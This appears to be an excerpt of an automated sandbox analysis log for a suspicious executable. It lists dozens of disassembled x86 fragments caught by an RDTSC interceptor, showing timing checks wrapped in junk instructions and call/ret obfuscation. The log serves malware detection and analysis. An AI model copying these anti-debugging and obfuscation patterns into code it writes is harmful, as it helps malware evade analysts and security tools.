Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135F25 second address: 1135F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135F29 second address: 1135F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE801498589h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113637F second address: 113639D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FE80147AC03h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113639D second address: 11363AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FE80149857Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11358A2 second address: 11358A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1136C2C second address: 1136C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1136C30 second address: 1136C3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FE80147ABF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11399EF second address: 1139A0B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE801498578h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jg 00007FE801498576h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1139A0B second address: 1139A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1139A14 second address: 1139A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80149857Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113DFD5 second address: 113DFDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113DFDA second address: 113DFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1108F1F second address: 1108F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1108F23 second address: 10EBA68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b call dword ptr [ebp+122D2539h] 0x00000011 push eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110906A second address: 110906E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109902 second address: 1109919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE801498583h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109919 second address: 1109959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or dword ptr [ebp+122D21A1h], ecx 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FE80147ABF8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D1991h], ecx 0x00000031 adc edi, 2AACF7BFh 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b push edi 0x0000003c pop edi 0x0000003d pop ecx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109959 second address: 110997B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FE801498580h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f js 00007FE80149857Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109E52 second address: 1109E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109FBA second address: 1109FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FE801498576h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109FC7 second address: 1109FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110A075 second address: 110A12A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FE801498578h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FE801498578h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e lea eax, dword ptr [ebp+1248EC1Dh] 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FE801498578h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e jmp 00007FE80149857Ah 0x00000053 nop 0x00000054 jnc 00007FE80149858Ah 0x0000005a push eax 0x0000005b pushad 0x0000005c jmp 00007FE801498583h 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FE801498589h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110A12A second address: 10EC635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FE80147ABF8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+1247BF1Ch], ebx 0x00000028 call 00007FE80147ABFDh 0x0000002d mov ecx, 311A0ABFh 0x00000032 pop edx 0x00000033 call dword ptr [ebp+122D3939h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10EC635 second address: 10EC63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10EC63A second address: 10EC65D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE80147AC15h 0x00000008 jmp 00007FE80147AC09h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113D1B5 second address: 113D1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007FE801498585h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FE801498583h 0x00000013 je 00007FE801498576h 0x00000019 popad 0x0000001a jp 00007FE80149857Eh 0x00000020 push esi 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113D1F7 second address: 113D20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnc 00007FE80147ABF6h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113DB9E second address: 113DBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FE80149858Bh 0x0000000b jmp 00007FE801498585h 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FE801498576h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113DBC6 second address: 113DBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147333 second address: 1147339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147339 second address: 1147359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE80147ABF6h 0x0000000a popad 0x0000000b jo 00007FE80147AC02h 0x00000011 jg 00007FE80147ABF6h 0x00000017 jbe 00007FE80147ABF6h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147359 second address: 1147366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147366 second address: 1147370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147370 second address: 1147374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147374 second address: 1147378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147378 second address: 1147389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FE801498576h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147625 second address: 114763D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE80147ABF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE80147ABFEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11477BE second address: 11477C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11477C2 second address: 11477C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1146BF1 second address: 1146C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FE801498576h 0x0000000d jg 00007FE801498576h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 jmp 00007FE801498588h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 114B954 second address: 114B96F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FE80147AC03h 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FE80147ABFBh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10BD109 second address: 10BD121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE801498582h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 114B4B2 second address: 114B4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 114B4BA second address: 114B4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 114B4BE second address: 114B4CD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE80147ABF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 114B641 second address: 114B653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007FE801498576h 0x0000000b jp 00007FE801498576h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 114B653 second address: 114B65C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1151788 second address: 115178C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1150E2A second address: 1150E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE80147ABF6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1150E35 second address: 1150E3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1150E3A second address: 1150E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1150E40 second address: 1150E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1150E48 second address: 1150E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FE80147AC05h 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 ja 00007FE80147ABF6h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1150E70 second address: 1150E84 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE80149857Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jc 00007FE80149858Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115114D second address: 1151166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80147AC05h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1151166 second address: 1151172 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE801498576h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1151172 second address: 11511A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FE80147ABF6h 0x00000009 jmp 00007FE80147AC03h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE80147ABFDh 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11511A3 second address: 11511C6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE801498585h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11511C6 second address: 11511CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115143A second address: 115147F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 jne 00007FE80149857Ch 0x0000000d ja 00007FE801498587h 0x00000013 pushad 0x00000014 jmp 00007FE801498588h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115147F second address: 11514C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80147ABFBh 0x00000009 jmp 00007FE80147AC01h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jc 00007FE80147ABFEh 0x00000017 jne 00007FE80147ABF6h 0x0000001d pushad 0x0000001e popad 0x0000001f jbe 00007FE80147ABFEh 0x00000025 jnc 00007FE80147ABF6h 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11514C4 second address: 11514D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007FE801498576h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1156074 second address: 11560C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FE80147AC03h 0x0000000c jo 00007FE80147ABFAh 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FE80147AC04h 0x00000020 pop edx 0x00000021 jc 00007FE80147ABFCh 0x00000027 js 00007FE80147ABF6h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11561D7 second address: 11561DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11561DD second address: 11561E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE80147ABF6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11561E9 second address: 115622B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498586h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FE801498581h 0x00000012 pop ebx 0x00000013 jng 00007FE80149857Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109B71 second address: 1109BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edx, ecx 0x0000000a mov ebx, dword ptr [ebp+1248EC5Ch] 0x00000010 sub dword ptr [ebp+122D2012h], edi 0x00000016 mov di, cx 0x00000019 add eax, ebx 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FE80147ABF8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 add cx, A424h 0x0000003a push eax 0x0000003b pushad 0x0000003c push edx 0x0000003d push eax 0x0000003e pop eax 0x0000003f pop edx 0x00000040 push edi 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1156500 second address: 1156504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1156E6F second address: 1156E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1156E73 second address: 1156E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1156E79 second address: 1156EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE80147AC05h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1156EA7 second address: 1156EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1156EAB second address: 1156EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115B133 second address: 115B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FE801498576h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115A380 second address: 115A386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115A386 second address: 115A38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115A4CE second address: 115A4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115A4D2 second address: 115A4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FE80149857Fh 0x0000000e jmp 00007FE80149857Bh 0x00000013 pop edi 0x00000014 js 00007FE80149857Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115A822 second address: 115A854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FE80147ABF8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FE80147AC09h 0x00000016 jnp 00007FE80147ABF6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115A854 second address: 115A85D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115A85D second address: 115A861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115A861 second address: 115A869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
